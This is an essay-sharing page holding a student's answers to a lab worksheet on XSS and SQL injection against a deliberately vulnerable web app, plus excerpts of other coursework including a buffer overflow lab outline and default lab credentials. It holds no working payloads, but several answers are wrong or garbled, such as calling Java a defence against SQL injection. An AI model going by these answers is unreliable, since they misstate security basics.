Lab #8 Perform a Website & Database Attack by Exploiting Identified Vulnerabilities

In: Computers and Technology

Submitted By sidiousnight
Words 526
Pages 3
Lab #8 – Assessment Worksheet


Perform a Website & Database Attack by Exploiting Identified Vulnerabilities


LAB Assessment Questions & Answers



1. Why is it critical to perform a penetration test on a web application prior to production
Implementation?

To make sure no one can penetrate your web application before you put it in a live situation.




2. What is a cross-site scripting attack? Explain in your own words.

Cross-site scripting is a type of computer security vulnerability typically found in web applications that enables attacks to inject client side script into web pages viewed by others




3. What is a reflective cross-site scripting attack?

A reflective attack a type of computer security vulnerability it involves the web application dynamically generating a response using non-sanitized data from the client scripts, like Java scripts or VB script, in the data sent to the server will send back a page with the script




4. What common method of obfuscation is used in most real world SQL attacks?

methods, including character scrambling and masking, numeric variance and nulling, rely on an array of built-in SQL Server system functions that are used for string manipulation.




5. Which web application attack is more prone to extracting privacy data elements out of a database?

SQL injections can be used to enter the database with administrator rights, best way to avoid this using Java on the website.




6. If you can monitor when SQL injections are performed on an SQL database, what would you
recommend as a security countermeasure to monitor your production SQL databases?

Well co-ordinated and regulary audited security checks is the best way forword.




7. Given that Apache and Internet Information Services (IIS) are the two most popular web application
servers for Linux and Microsoft Windows…...

Similar Documents

Vulnerability

...Article on Vulnerablity Nur 440 August 22, 2011 Vulnerability Article As cited by De, and Anderson (2008), according to Aday (2001), “vulnerable populations are those at risk for poor physical, psychological, or social health. Anyone can be vulnerable at any given point in time as a result of life circumstances or response to illness or events” (p. 3). This particular article will look at the groups who are vulnerable to influenza. As stated by Hutchins, Truman, Merlin, and Redd (2009) “the US national strategy for pandemic influenza preparedness and response assigns roles to governments, businesses, civic and community-based organizations, individuals, and families” (para. 1). Looking at the group that would have a greater risk there are many barriers. One of the barriers is ensuring that all levels from government, right down to the individual act efficiently and swiftly with the plan of action. Others may be transportation, lack of insurance, lack of knowledge, and the list goes on. There are many vulnerable groups when looking at containing or minimizing an outbreak of influenza. Some of the top groups are newborn’s/infants, poverty/poor class of society (no insurance), and the elderly (>65 years-old). A person then can break the groups down even more and say; anyone within these groups that are compromised with other health problems may be at an even greater risk. With influenza very easily contracted from person to person along with looking at these...

Words: 427 - Pages: 2

Lab #8 Perform a Website & Database Attack by Exploiting Identified Vulnerabilities

...Lab #8 – Assessment Worksheet Perform a Website & Database Attack by Exploiting Identified Vulnerabilities LAB Assessment Questions & Answers 1. Why is it critical to perform a penetration test on a web application prior to production Implementation? To make sure no one can penetrate your web application before you put it in a live situation. 2. What is a cross-site scripting attack? Explain in your own words. Cross-site scripting is a type of computer security vulnerability typically found in web applications that enables attacks to inject client side script into web pages viewed by others 3. What is a reflective cross-site scripting attack? A reflective attack a type of computer security vulnerability it involves the web application dynamically generating a response using non-sanitized data from the client scripts, like Java scripts or VB script, in the data sent to the server will send back a page with the script 4. What common method of obfuscation is used in most real world SQL attacks? methods, including character scrambling and masking, numeric variance and nulling, rely on an array of built-in SQL Server system functions that are used for string manipulation. 5. Which web application attack is more prone to extracting privacy data elements out of a database? SQL injections can be used to enter the database with administrator rights, best way to avoid this using Java on the website. 6. If...

Words: 526 - Pages: 3

Lab 8

... folders used to store vital company information. 7. What have more than one database for your mailbox server? Because it optimizes database performance as well as provides for flexible recovery in the case of database corruption. If a single database becomes corrupted, then you can take the single database offline by dismounting it and then restore it from backup without affecting the other three databases. 8. What is the purpose of limiting hard drive space available for emails? The purpose is to prevent ambitious users from using up all of the available space on the Mailbox role servers. 9. Explain what occurs as a user reaches their email storage limit. The user will receive a warning email at 1:00 a.m. from Exchange indicating that he is approaching his limit and should remove any unnecessary emails. 10. What sort of security features can be provided by the Exchange Server 2007 when a user is accessing the server remotely? You can now restrict the user features that are available in OWA as well as the company file servers that OWA users are allowed to access. 11. Why do administrators disable the “change password” feature of OWA? The do this because it prevents a malicious user from changing a password using OWA on an unattended system and locking out the real user as a result. 12. Define the Send connectors and receive connectors. Receive connectors are stored on a Hub or Edge role server and specify how to handle incoming traffic from......

Words: 923 - Pages: 4

Lab 8

...IT255 Introduction to Information Systems Security Laboratory #8 NAME ________________tom ferraiuolo________________________________ Lab #8: Perform a Website & Database Attack by Exploiting Identified Vulnerabilities Learning Objectives and Outcomes Upon completing this lab, students will be able to complete the following tasks: • Identify web application and web server backend database vulnerabilities as viable attack vectors • Develop an attack plan to compromise and exploit a web site using cross-site scripting (XSS) against sample vulnerable web applications • Conduct a manual Cross-site Scripting (XSS) attack against sample vulnerable web applications • Perform SQL injection attacks against sample vulnerable web applications with e-commerce data entry fields • Mitigate known web application and web server vulnerabilities with security countermeasures to eliminate risk from compromise and exploitation Required Setup and Tools 1. Target VMs as described by the lab: a. Instructor and Student VM workstations with desktop applications and tools. b. Ubuntu Linux 10.04 LTS Server (VM Name: “TargetUbuntu01”) o Computer Name: Ubuntu01 o ONE User available ONLY: administrator <case sensitive> o Password: ISS316Security (case sensitive) Apache running “Damn Vulnerable Web App” (DVWA) o URL: http://<serveripaddress>/dvwa o Username: admin o Password: password 2.Standard ITT onsite student...

Words: 1573 - Pages: 7

Lab About Buffer Overflow Attack

...Tasks 1) Open linux terminal and compile victimFile.c, and run it. Type the message that you see: After running and compiling the victimFile.c the massage shown was: you didn’t provide any argument: ./.out <string> 2) Check the source code of victimFile.c by opening the file in an editor. Which variable can be used to apply a buffer overflow attack? Why? var, because the input variable will be used inside the copy function and will copy it to var; and var is array of characters with fixed size of 20. 3) Run the file with an argument that will cause an exception (execution error). How long was your argument? (How many letters)? Since var max size is 20, so any argument that is more than 20 will cause an exception. Example “123456789123456789123” 21 letters as shown below: 4) Disable the buffer overflow protector that linux has, and try to overflow the buffer by increasing the length of your argument until you receive “Segmentation fault”. How long is the argument now? After disabling the buffer overflow protector using –fno-stack-protector, now we can overwrite into the stack without Abort. An argument of length 32 causes the segmentation fault. 20 (var) + 4 (var2)+ 4(input)+ 4(bptr) =32 5) a) In this step we created the script.pl file that needs arguments and the address to where it should jump. In our case we want to jump to hacked function. b) We run the gdb tool using “gdb a.out”. After that, using “(gdb) disassemble hacked...

Words: 482 - Pages: 2

Database Unit 1 Lab 1

...Lab 1 1. A collection of information accessible from a computer or server 2. DBMS is a Database Management System that organizes information internally. 3. Dbms stores information, spreadsheet runs formulas 4. Product | Use | Where it was used | Cost | DB2 | Open database environment | A small single-user application to a large multi-user system. | $598 + $99 additional user | Microsoft Access | Relational databases that have tables of data. | Software developers and data architects | $199 (Amazon) | Microsoft SQL Server | primary function is to store and retrieve data as requested by other software applications | workloads ranging from small single-machine applications to large Internet-facing applications with many concurrent users | Vary (Different Prices for different purposes) | Filemaker Pro | database engine with a GUI-based interface | ??? | $329.00 | Oracle | transfer any customer info from one location to any other in the world | larger organizations and small chain stores | ??? (Couldn’t find anything) | Mysql | database for use in web applications | Personal and commercial use | $2k-$10k/year | 5. “DBMS stands for database management system whereas RDBMS stands for relational database management system; these softwares are created to maintain and utilize large scale collection of data in an efficient manner.” http://www.differencebetween.info/difference-between-dbms-and-rdbms 6. 290 7. Peng J Wu 8. Footlocker...

Words: 447 - Pages: 2

Database Lab

...Lab 1.3 (Group B) – Create a Statement of Work Step 1: Read the Grandfield College scenario on p. 18 of the textbook. Step 2: Identify the major topics for this database Step 3: Write a draft statement of work that includes the scope, objectives, and a preliminary timeline. You will need to turn in a Word document to the instructor by the end of class. Step 2: Major Topics for Database: a. Software b. Software Version c. Licensed Agreement d. Machine e. Machine Location f. Install Data g. Software Request h. Availability i. Software location j. Access level Step 3: Scope Grandfield College wants a database to track faculty and staff computers, what software is installed on each, who has access to each computer, and requests for new software. Being able to track install issues would also be of great benefit for easier troubleshooting. Objectives ● Track what software is installed and removed and the licensing and type of install (local vs. server) for the software on faculty and staff computers in one place. ● Track the location of the faculty and staff computers and who has access to each. ● Track requests for new software and when software is checked out to faculty with administrator privileges on their machines. Tasks and Timeline 1. Gathering Data: This task will consist of obtaining the spreadsheets that contain the lists of the listing of software, the type of licensing for the...

Words: 459 - Pages: 2

Lab # 8

...1. Once an organization has identified a known vulnerability, what recourse does the company have? The company has two courses- they can accept the vulnerability and hope that nobody finds the vulnerability or the company can take steps by utilizing their IT department or contract out so that their system can be hardened against attacks. 2. If an application has known vulnerability that is reported, how should a company proceed? The company should first see if the application has any new patches that would secure this vulnerability. 3. Name two network entry points as it pertains to network accessibility? Work stations and server. 4. What types of authentication and authorization requirements should be audited in a vulnerability assessment? Passwords and data access. 5. When categorizing vulnerabilities for a report that enumerates them, what would be a model? Common Vulnerability Enumeration (CVE) 6. What is the standard formula to rank potential threats? Decompose the application, determine and rank threats, and determine countermeasures and mitigation. 7. If an organization is identified as not using any password policies for any of its applications what would be two suggestions to note in the assessment? That the organization is a great risk without any password policies. 8. Should newly-released patches for a known vulnerability be applied to production system once released? Yes 9. What is the importance of having a security incident...

Words: 473 - Pages: 2

Lab 8

...Jack Ferguson 12 May 14 Lab #8 In cryptography, encryption is the process of encoding messages in such a way that eavesdroppers or hackers cannot read it, but that authorized parties can. In an encryption scheme, the message or information (referred to as plaintext) is encrypted using an encryption algorithm, turning it into an unreadable ciphertext . This is usually done with the use of an encryption key, which specifies how the message is to be encoded. Any adversary that can see the ciphertext should not be able to determine anything about the original message. An authorized party, however, is able to decode the ciphertext using a decryption algorithm, that usually requires a secret decryption key that adversaries do not have access to. For technical reasons, an encryption scheme usually needs a key-generation algorithm to randomly produce keys. There are two basic types of encryption schemes: Symmetric-key and public-key encryption. In symmetric-key schemes, the encryption and decryption keys are the same. Thus communicating parties must agree on a secret key before they wish to communicate. In public-key schemes, the encryption key is published for anyone to use and encrypt messages. However, only the receiving party has access to the decryption key and is capable of reading the encrypted messages. Public-key encryption is a relatively recent invention: historically, all encryption schemes have been symmetric-key (also called private-key...

Words: 1540 - Pages: 7

Lab 5 – Perform Protocol Capture & Analysis Using Wireshark & Netwitness Investigator

...Lab 5 – Perform Protocol Capture & Analysis Using Wireshark & Netwitness Investigator 1. What is the purpose of the address resolution protocol (ARP)? ARP is used to convert an IP address to a physical address such as an Ethernet address. 2. What is the purpose of the dynamic host control protocol (DHCP)? DHCP automates and controls the assignment of IP address configurations from a central position. 3. What was the DHCP allocated source IP host address for the Student VM and Target VM? 172.30.0.4 – Student VM 172.30.0.8 – Target VM 4. When you pinged the targeted IP host, what was the source IP address and destination IP address of the ICMP echo-request packet? Source: 172.30.0.2 Target: 172.30.0.8 5. Did the targeted IP host respond to the ICMP echo-request packet with an ICMP echo-reply packet? If yes, how many ICMP echo-request packets were sent back to the IP source? Yes it did. There were 8 packets. 6. Find a TCP 3-way handshake for a Telnet, FTP, or SSH session. What is the significance of the TCP three-way handshake? 172.17.0.99 172.17.0.2 TCP x9-icue > telnet [SYN] Seq=0 Win=65535 Len=0 MSS=1460 172.17.0.2 172.17.0.99 TCP telnet > x9-icue [SYN, ACK] Seq=0 Ack=1 Win=5840 Len=0 MSS=1460 172.17.0.99 172.17.0.2 TCP x9-icue > telnet [ACK] Seq=1 Ack=1 Win=65535 Len=0 The three way handshake is needed to establish a reliable connection between computers. The handshake allows client to server communications to agree on security...

Words: 536 - Pages: 3

Lab 8

...1. Explain the following command: rpm –qf/bin/ls Used to figure out what package the installed version belongs to. 2. Discuss the purpose of a software repository as it relates to YUM? The yum system does not require any routine maintenance. It is useful to disable or remove repository definitions that are no longer required, as each repository that is defined and enabled is checked for every operation. 3. How can one ensure a download tar ball is legitimate and hasn’t been tampered with? Run a checksum test 4. List and explain at least 3 switches available with the tar command that can be useful in extracting and installing a tarball. –make install ; will install the binary file ./configure ; will make sure that the system has all the library files that are required to install the file tar xvzf file_name.tar.gz ; extracts the file specified (eg. file_name) 5. List and explain at least 3 switches associated with the rpm command that can be leveraged to verify, list and install rpm packages. rpm –ivh ; RPM filename has package name, version, release & architecture name (-i : install, -v : verbose, -h : print hash marks as the package archive is unpacked). rpm -qlp ; will list out the file without extracting into the local directory folder. rpm –Vp ; compares information about the installed files with information about the files taken from the metadata stored within the rpm database. 6. What security countermeasure can you enable to verify......

Words: 367 - Pages: 2

Lab 2 Performing a Vulnerability Assessment

...Lab Assessment Questions & Answers 1. What is Zenmap typically used for? How is it related to Nmap? Describe a scenario in which you would use this type of application. Zenmap is the official GUI for the Nmap Security Scanner. It is a multi-platform, free and open-source application designed to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. This can be used for example to audit a network on a specific IP scheme. 2. Which application can be used to perform a vulnerability assessment scan in the reconnaissance phase of the ethical hacking process? OpenVAS 3. What must you obtain before you begin the ethical hacking process or penetration test on a live production network, even before performing the reconnaissance step? Written permission must be obtain before performing an intrusive penetration test or vulnerability assessment scan on a live network. 4. What is a CVE listing? Who hosts and who sponsors the CVE database listing Web site? CVE is a publicly available and free to use list and dictionary of standardized identifiers for common computer vulnerabilities and exposures. It is sponsored by the office of Cybersecurity at the US Department of Homeland Security. The site is managed by the MITRE Corp. 5. Can Zenmap detect which operating systems are present on IP servers and workstations? Which option includes that scan? Yes, by using TCP/IP stack fingerprinting...

Words: 406 - Pages: 2

Lab 4 Performing a Vulnerability Assessment

.... 3. What must you obtain before you begin the ethical hacking process or penetration test on a live production network, even before performing the reconnaissance step? Written permission must be obtained before performing an intrusive penetration test or vulnerability assessment scan on a live network. 4. What is a CVE listing? Who hosts and who sponsors the CVE database listing Web site? CVE is a publicly available and free to use list and dictionary of standardized identifiers for common computer vulnerabilities and exposures. CVE is co-sponsored by the office of Cyber security at the US Department of Homeland Security. The website is sponsored and managed by the MITRE Corporation.   5. Can Zenmap detect which operating systems are present on IP servers and workstations? Which option includes that scan? Yes, by using TCP/IP stack fingerprinting option. 6. How can you limit the breadth and scope of a vulnerability scan? By using the parameter -exclude in the command entry, for example -exclude 172.30.0.2 7. Once a vulnerability has been identified by OpenVAS, where would you check for more information regarding the identified vulnerability, exploits, and any risk mitigation solution? OpenVAS 8. What is the major difference between Zenmap and OpenVAS? 9. Why do you need to run both tools like Zenmap and OpenVAS to complete the reconnaissance phase of the ethical hacking process?...

Words: 466 - Pages: 2

Lab 8

...Joshua Reynolds FW9135 Psy1010 Section 052 TA Monica De Iorio 8th Lab Assignment There are many ways to cope with stress but we learned about 3 specific strategies in lab. These three included cognitive, behavioral, and avoidance strategies. Active cognitive strategies include actively thinking about a situation to adjust more effectively to it. This strategy is one of the better ways to cope with stress. Then you have active behavioral strategies and this involves actively taking some type of action to improve a problem situation that is stressing you out. This is the other strategy that is best for relieving stress. The third strategy that we had learned about was the avoidance strategy. This strategy is not a good strategy to use and can sometimes make things worse. Avoidance involves keeping the stressful situation and circumstances out of awareness. This could potentially cause more stress. The strategy that I tend to use the most is the active behavioral strategy. I like to take action in everything that I do, especially when it involves things that are causing or will cause myself to stress out. An example of that would be of someone had a problem with me I would go talk to them about it and try to figure out what the problem is. Instead of avoiding it or just thinking about it I would go do something about it. Another example could be if I had a bad grade in a class I would go see my professor to see what I could do about it and make that extra effort. The......

Words: 315 - Pages: 2

Lab 8

...Lab #8 – Assessment Worksheet Performing a Web Site and Database Attack by Exploiting Identified Vulnerabilities Course Name and Number: Student Name: Instructor Name: Lab Due Date: Overview In this lab, you performed simple tests to verify a cross-site scripting (XSS) exploit and an SQL injection attack using the Damn Vulnerable Web Application (DVWA), a tool left intentionally vulnerable to aid security professionals in learning about Web security. You used a Web browser and some simple command strings to identify the IP target host and its known vulnerabilities, and then attacked the Web application and Web server using cross-site scripting (XSS) and SQL injection to exploit the sample Web application running on that server. Lab Assessment Questions & Answers 1. Why is it critical to perform a penetration test on a Web application and a Web server prior to production implementation? To make sure no one can penetrate your web application before you put it in a live situation. 2. What is a cross-site scripting attack? Explain in your own words. Cross-site scripting is a type of computer security vulnerability typically found in web applications that enables attacks to inject client side script into web pages viewed by others 3. What is a reflective cross-site scripting attack? A reflective attack a type of computer security vulnerability it involves the web application dynamically generating a response...

Words: 442 - Pages: 2